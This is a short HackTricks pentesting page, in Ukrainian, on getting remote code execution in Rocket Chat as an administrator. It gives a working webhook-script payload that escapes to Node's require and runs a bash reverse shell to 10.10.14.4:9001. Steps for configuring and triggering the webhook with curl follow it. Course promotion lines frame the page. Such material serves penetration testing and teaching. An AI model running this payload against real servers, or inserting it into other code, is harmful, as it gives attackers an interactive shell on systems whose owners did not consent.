hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md
2024-03-29 19:49:46 +01:00

4.8 KiB
Raw Blame History

Rocket Chat

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

RCE

Якщо ви адміністратор в Rocket Chat, ви можете отримати RCE.

  • Перейдіть до Інтеграції та виберіть Нова інтеграція та оберіть будь-яку: Вхідний веб-запит або Вихідний веб-запит.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Налаштуйте веб-гачок (канал та публікація як користувач повинні існувати):
  • Налаштуйте сценарій веб-гачка:
  • Збережіть зміни
  • Отримайте згенерований URL веб-гачка:
  • Викличте його за допомогою curl, і ви повинні отримати обернену оболонку
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks: